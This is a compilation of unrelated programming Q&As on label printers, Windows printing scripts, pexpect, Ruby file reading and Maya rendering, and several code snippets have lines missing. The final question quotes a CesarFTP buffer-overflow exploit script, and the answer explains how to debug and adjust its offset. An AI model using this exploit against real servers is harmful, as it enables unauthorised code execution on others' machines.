ZPL command length limit? - zpl

I am generating ZPL command string and the printer (ZT410) does not print all the labels sent. I simply loop through the following code and send the string to the printer (via the IP address on port 9100). Each loop contains a unique set of data where row['item_desc'],row['our_part_number'], and part number change each iteration (so I am not just trying to print 522 identical labels).
command += '^XA';
command += '^LT23';
command += '^FO125,30';
command += '^A0N,85,50';
command += '^FB950,1,,C'
command += '^FD'+row['item_desc']+'^FS';
command += '^FO20,260';
command += '^A0N,50,50';
command += '^FD'+part_number+'^FS';
command += '^FO122,260';
command += '^A0N,50,50';
command += '^FB950,1,,C'
command += '^FD'+row['our_part_number']+'^FS';
command += '^FO935,255';
command += '^A0N,25,25';
command += '^FB200,2,,R'
command += '^FDMy Company Name Phone_Number ^FS';
command += '^FO'+margin+',105';
command += '^BY3';
command += '^B3N,N,144,N,N';
command += '^FD'+row['our_part_number']+'^FS';
command += '^XZ';
My test lot is 522 labels. Before adding the company info and barcode, the printer printed all 522 labels, but with the code above, it only prints 485 labels.
Where is the limit? Is there a limit on the string length that can be sent to the port? Should I add a carriage return and line feed after each label (so the printer knows where to break the string)? Or is there a IP:port timeout?
The printer prints the labels, but doesn't respond in any way to the port that sent the command. If I break the labels into individual command strings and send them sequentially without pause, the printer didn't print ANY labels. Is it possible to query the printer to know when to send the next command string?
Normally, I would just experiment with trial and error, but in this case that method is expensive and wasteful...

as a command before the ^XZ.
I'd suggest you only send it once though. Sending it 522 times (or even 485 times) might just be a tad wasteful.

Use FN fields and save the label locally on the printer(using ^DF), then just call the label and populate the dynamic data in the FN fields


print an image from command line and await print job completion on Windows

I needed to write a solution to write data on and then print RFID labels en-masse, each generated as .png images from a template python script and data taken from a database or excel file.
To print the program simply calls the relative system utility (CUPS on unix systems) using subprocess.check_call(print_cmd) passing the image file (saved on a ram-mounted file system for minimal disk usage)
Now, it also needs to run on Windows systems, but there is not really a decent system utility for that, and solutions under a similar question command line tool for print picture? don't account for print-job completion or if the job results in an error, the margins are all screwed and the image is always rotated 90 degrees for some reason.
How can I sanely print an image using a command or a script in Windows and wait for it to complete successfully or return an error if the job results in an error?
Possibly with no dependencies
If you can install dependencies, there are many programs that offer a solution out-of-the-box.
The only sane way i could find to solve this issue with no dependencies is by creating a powershell script to account for this
param (
[string] $file = $(throw "parameter is mandatory"),
[string] $printer = "EXACT PRINTER NAME HERE"
$ERR = "UserIntervention|Error|Jammed"
$status = (Get-Printer -Name $printer).PrinterStatus.ToString()
if ($status -match $ERR){ exit 1 }
# https://stackoverflow.com/a/20402656/17350905
# only sends the print job to the printer
rundll32 C:\Windows\System32\shimgvw.dll,ImageView_PrintTo $file $printer
# wait until printer is in printing status
do {
$status = (Get-Printer -Name $printer).PrinterStatus.ToString()
if ($status -match $ERR){ exit 1 }
Start-Sleep -Milliseconds 100
} until ( $status -eq "Printing" )
# wait until printing is done
do {
$status = (Get-Printer -Name $printer).PrinterStatus.ToString()
if ($status -match $ERR){ exit 1 }
Start-Sleep -Milliseconds 100
} until ( $status -eq "Normal" )
I would then need to slightly modify the print subprocess call to
powershell -File "path\to\print.ps1" "C:\absolute\path\to\file.png"
Then there are a couple of necessary setup steps:
(discaimer, I don't use windows in english so i don't know how the english thigs are supposed to be called. i will use cursive for those)
create an example image, right click and then select Print
from the print dialog that opens then set up all the default options you want, like orientation, margins, paper type, etc etc for the specific printer you're gonna use.
Go to printer settings, under tools then edit Printer Status Monitoring
edit monitoring frequency to "only during print jobs". it should be disabled by default
in the next tab, modify polling frequency to the minimum available, 100ms during print jobs (you can use a lower one for the while not printing option
Assuming the following:
only your program is running this script
theres always only 1 printing job at a time for a given printer
the printer drivers were not written by a monkey and they actually report the current, correct printer status
This little hack will allow to print an image from a command and await job completion, with error management; and uses only windows preinstalled software
Further optimization could be done by keeping powershell subprocess active and only passing it scripts in the & "path\to\print.ps1" "C:\absolute\path\to\file.png" format, waiting for standard output to report an OK or a KO; but only if mass printing is required.
Having had to work on this again, just wanted to add a simpler solution in "pure" python using the pywin32 package
import time
import subprocess
from typing import List
import win32print as wprint
PRINTERS: List[str] = [p[2] for p in wprint.EnumPrinters(wprint.PRINTER_ENUM_LOCAL)]
PRINTER_DEFAULT = wprint.GetDefaultPrinter()
print("[!!] an error occured while retrieving printers")
# you could throw an exception or whatever
# bla bla do other stuff
if "WIN32_SUPPORTED" in globals():
__printImg_win32(file, printer_name)
def __printImg_win32(file: str, printer: str = ""):
if not printer:
# verify prerequisites here
# i still do prefer to print calling rundll32 directly,
# because of the default printer settings shenaningans
# and also because i've reliably used it to spool millions of jobs
def __monitorJob_win32(printer: str, timeout=16.0):
p = wprint.OpenPrinter(printer)
# wait for job to be sheduled
t0 = time.time()
while (time.time()-t0) < timeout:
ptrr = wprint.GetPrinter(p, 2)
# unsure about those flags, but definitively not errors.
# it seems they are "moving paper forward"
if ptrr["Status"] != 0 and ptrr["Status"] not in [1024,1048576]:
raise Error("Printer is in error (status %d)!" % ptrr["Status"])
if ptrr["cJobs"] > 0:
raise Error("Printer timeout sheduling job!")
# await job completion
t0 = time.time()
while (time.time()-t0) < timeout:
ptrr = wprint.GetPrinter(p, 2)
if ptrr["Status"] != 0 and ptrr["Status"] not in [1024,1048576]:
raise Error("Printer is in error (status %d)!" % ptrr["Status"])
if ptrr["cJobs"] == 0 and ptrr["Status"] == 0:
raise Error("Printer timeout waiting for completion!")
useful additional resources
Print image files using python
Catch events from printer in Windows
pywin32's win32print "documentation"

ignore ANSI colors in pexpect response

Can I use pexpect in a way that ignores ANSI escape codes (especially colors) in the output? I am trying to do this:
expect('foo 3 bar 5')
...but sometimes I get output with ANSI-colored numbers. The problem is I don't know which numbers will have ANSI colors and which won't.
Is there a way to use pexpect but have it ignore ANSI sequences in the response from the child process?
Here's a not entirely satisfying proposal, subclassing 2 routines of the pexpect classes pexpect.Expecter and pexpect.spawn so that incoming data can have the escape sequences removed before they get added to the buffer and tested for pattern match. It is a lazy implementation in that it assumes any escape sequence will always be read atomically, but coping with split reads is more difficult.
# https://stackoverflow.com/a/59413525/5008284
import re, pexpect
from pexpect.expect import searcher_re
# regex for vt100 from https://stackoverflow.com/a/14693789/5008284
class MyExpecter(pexpect.Expecter):
ansi_escape = re.compile(rb'\x1B[#-_][0-?]*[ -/]*[#-~]')
def new_data(self, data):
data = self.ansi_escape.sub(b'', data)
return pexpect.Expecter.new_data(self, data)
class Myspawn(pexpect.spawn):
def expect_list(self, pattern_list, timeout=-1, searchwindowsize=-1,
if timeout == -1:
timeout = self.timeout
exp = MyExpecter(self, searcher_re(pattern_list), searchwindowsize)
return exp.expect_loop(timeout)
This assumes you use the expect() call with a list, and do
child = Myspawn("...")
rc = child.expect(['pat1'])
For some reason I had to use bytes rather than strings as I get the data before it is decoded, but that may just be because of a currently incorrect locale environment.
This workaround partially defeats the purpose of using pexpect but it satisfies my requirements.
The idea is:
expect anything at all (regex match .*) followed by the next prompt (which in my case is xsh $ - note the backslash in the "prompt" regex)
get the after property
trim off the prompt: [1:]
remove ANSI escape codes from that
compare the filtered text with my "expected" response regex
with pexpect.spawn(XINU_CMD, timeout=3, encoding='utf-8') as c:
# from https://stackoverflow.com/a/14693789/5008284
ansi_escape = re.compile(r"\x1B[#-_][0-?]*[ -/]*[#-~]")
system_prompt_wildcard = r".*xsh \$ " # backslash because prompt is "xsh $ "
# tests is {command:str, responses:[str]}
for test in tests:
response = c.expect([system_prompt_wildcard, pexpect.EOF, pexpect.TIMEOUT]) #=> (0|1|2)
if response != 0: # any error
response_text = c.after.split('\n')[1:]
for expected, actual in zip(test['responses'], response_text):
norm_a = ansi_escape.sub('', norm_input.sub('', actual.strip()))
result = re.compile(norm_a).findall(expected)
if not len(result):

Assign File.readlines[n] to variable

I'm reading a text file which has instructions on each line. I want to assign the text on each line to it's own variable. When I do this, the value returned is nil but when I output the value of readlines[n] it is correct.
# Using the variable (incorrect result)
puts current_zone_size
# Using readlines after variable assignment (incorrect result)
current_zone_size = instructions.readlines[0]
# Using readlines (correct result)
> 8 10
This is my code:
instructions = File.open("operator-input.txt", "r")
current_zone_size = instructions.readlines[0]
rover_init_location_orientation = instructions.readlines[1]
rover_movements = instructions.readlines[2]
This is the text in the file being read:
8 10
1 2 E
Is the file being closed? Is this the reason I can't assign values from File.readlines[n] to variables if I'm not doing the variable assignment from within a block?
Also, the file will only ever have three lines which is why I'm not using a loop to read the lines.
IO#readlines reads all the lines in the file. It should not come as a surprise that, in order to read all the lines in the file, it has to read the entire file.
So, where is the file pointer after you read the entire file? It is at the end of the file.
What happens if you call IO#readlines the second time, when the file pointer is still at the end of the file? It will start reading at the position of the file pointer, which means it will read an empty file.
Therefore, if you want to do it the way you are doing it, you need to reset the file pointer to the beginning of the file every time you call IO#readlines:
instructions = File.open('operator-input.txt', 'r')
current_zone_size = instructions.readlines[0]
instructions.pos = 0
rover_init_location_orientation = instructions.readlines[1]
instructions.pos = 0
rover_movements = instructions.readlines[2]
Note also that you are leaking resources: you never close the file, so it will only by closed at the earliest by Ruby when the instructions variable gets out of scope and the File instance gets garbage-collected, and at the latest by the OS automatically when your Ruby process exits, which may be a long time later. So, your code should rather be:
instructions = File.open('operator-input.txt', 'r')
current_zone_size = instructions.readlines[0]
instructions.pos = 0
rover_init_location_orientation = instructions.readlines[1]
instructions.pos = 0
rover_movements = instructions.readlines[2]
In general, it is much better to use the block form of File::open, which closes the file handle automatically for you at the end of the block, and also ensures that this happens even in the case of complex control flow, errors, or exceptions:
File.open('operator-input.txt', 'r') do |instructions|
current_zone_size = instructions.readlines[0]
instructions.pos = 0
rover_init_location_orientation = instructions.readlines[1]
instructions.pos = 0
rover_movements = instructions.readlines[2]
Note, however, that what you want to do is horribly inefficient: you read the entire file, then take the first line, throw the rest away. Then you read the entire file again, take the second line, throw the rest away. Then you read the entire file again, take the third line, throw the rest away.
It makes much more sense to read the entire file once and then take the lines you need. Something like this:
File.open('operator-input.txt', 'r') do |instructions|
current_zone_size, rover_init_location_orientation, rover_movements =
However, in the case where all you do is open the file, read all lines, then immediately close it again, you should rather use the IO::readlines method instead of IO#readlines, since it does all three things for you in one call:
current_zone_size, rover_init_location_orientation, rover_movements =
I ended up reading all the lines at once, now I'm able to set each variable outside of a block. Like this:
instructions = File.readlines "operator-input.txt"
current_zone_size = instructions[0]
rover_init_location_orientation = instructions[1]
rover_movements = instructions[2]
puts current_zone_size
> 8 10

Print current frame during command line render?

Is there a way to basically print my own output during a command line render?
Let's say I don't need/want all the other output that maya spits out by default, I know you can change the verbosity level, but there's very specific things I'd like to output but I can't figure it out. I currently render out the verbosity output to file, so I wanted to print in the terminal (I'm using MAC) the frame that the render is currently up to.
This may just be simple minded, but here's what I tried:
Render -preFrame "print `currentTime -q`;" -s 1 -e 20 -rd /render/directory/ maya_file.mb
Obviously, -preFrame expects a string, according to the docs this can take mel commands, but obviously this is limited to certain commands, I'm assuming the currentTime command is pulling the information from the timeline in maya, not queering it from the Renderer it self... When I run the above command, straight away, it spits out this: -bash: currentTime: command not found and soon after the render fails/doesn't start.
Idealy, I'd like to print the following as it starts each frame:
"Started rendering frame XXXX at TIME GOES HERE", that way, I can quickly look at the terminal, and see if the renderer has failed, stuck or where it's up to and when it started it.
So my question is, seeing is currentTime is a mel command used from within Maya, is there another way I could print this information?
After many hours of searching for this answer, I ended up finding out that you can start maya as an interactive shell. By doing this, I was able to source a script as I opened it, and run whatever I want into memory as If I had Maya open at the time.
/Applications/Autodesk/maya2014/Maya.app/Contents/MacOS/maya -prompt -script "/Volumes/raid/farm_script/setupRender.mel"
In the setupRender.mel file, I was able to assign variables, containing options for renders etc, in doing this, I was also able to create a global variable for the frame number, and increment it during the preFrame callback, like so:
int $startFrame = 100;
int $endFrame = 1110;
global int $frameCount = 0;
string $preRenderStatistics = "'global int $frameCount; $frameCount = " + $startFrame + ";'";
string $preFrameStatistics = "'print(\"Rendering frame: \" + $frameCount++)'";
string $additionalFlags = "";
string $sceneFilePath = "'/Volumes/path/to/file/intro_video_001.mb'";
system("Render -preRender " + $preRenderStatistics + " -preFrame " + $preFrameStatistics + " -s " + $startFrame + " -e " + $endFrame + " -x " + $additionalFlags + " " + $sceneFilePath);
This is a very simplified version of what I currently have, but hopefully this will help others if they stumble across it.
Take a look at the pre render layer MEL and/or pre render frame MEL section of the Render Settings.
It expects MEL, so you'll either need to write it in MEL or wrap your python in MEL. For such a simple use, I'd say just write it in MEL:
print `currentTime -q`

Why is cesarftp python exploits not working?

I tested on my server that has cesarftp running. I debugged the ftp server on the server using ollydbg.
The exploit I used is http://www.exploit-db.com/exploits/1906/
#CesarFtp 0.99g 0day Exploit
#Proof of Concept: execute calc.exe
#Tested on XP sp2 polish
#Bug found by h07 [h07#interia.pl]
#Date: 10.06.2006
from socket import *
shellcode = ( #execute calc.exe <metasploit.com>
def intel_order(i):
a = chr(i % 256)
i = i >> 8
b = chr(i % 256)
i = i >> 8
c = chr(i % 256)
i = i >> 8
d = chr(i % 256)
str = "%c%c%c%c" % (a, b, c, d)
return str
host = ""
port = 21
user = "ftp"
password = "ftp"
EIP = 0x773D10A4 #jmp esp <shell32.dll XP professional sp2 english>
s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
print s.recv(1024)
s.send("user %s\r\n" % (user))
print s.recv(1024)
s.send("pass %s\r\n" % (password))
print s.recv(1024)
buffer = "MKD "
buffer += "\n" * 671
buffer += "A" * 3 + intel_order(EIP)
buffer += "\x90" * 40 + shellcode
buffer += "\r\n"
print "len: %d" % (len(buffer))
print s.recv(1024)
# milw0rm.com [2006-06-12]
I changed the "JMP ESP" address to the correct one (as the server is not running Polish XP; it's running English XP. I found this using executable modules on ollydbg and searching for command "JMP ESP".)
However, the exploit failed to execute properly, and after logging in, the ftp server just crashed, not bringing up shell.
It seems to me that the code only needs modification on "JMP ESP" area..
What did I do wrong?
Edit: the shellcode seems to, if properly executed, bring up calc.exe. This didn't happen. And obviously, there was no shell obtained.
It's possible the vulnerable function is not copying your data with strcpy() but with strcat(). This is a common rookie mistake when writing exploits by trial and error.
Since the value being read is supposed to be a path, it's possible that what's really happening here is that your string is being concatenated to the path of the root of the FTP server.
If that happens, then you not only have to change the just address but the offset to it in the payload string (the "671" value). Unfortunately this would also mean the exploit will depend on knowing the exact location of the FTP root.
To make sure you'll have to attach a debugger and see what's going on before and after the payload is sent. Try the following:
Attach the debugger to the FTP server.
Run the exploit. It will crash the server.
Now EIP will point to 0x90909090 or 0x0d0d0d0d. Examine the stack until you find a valid pointer to code (the return address of a parent function).
Now kill the server and start it over.
Attach the debugger again, and set a breakpoint at the beginning of that parent function you found.
Run the exploit again. Now the breakpoint should hit. Run the code step by step until you find the vulnerable function. Now you'll be able to see which function has the bug and what the stack looks like before you smash it.
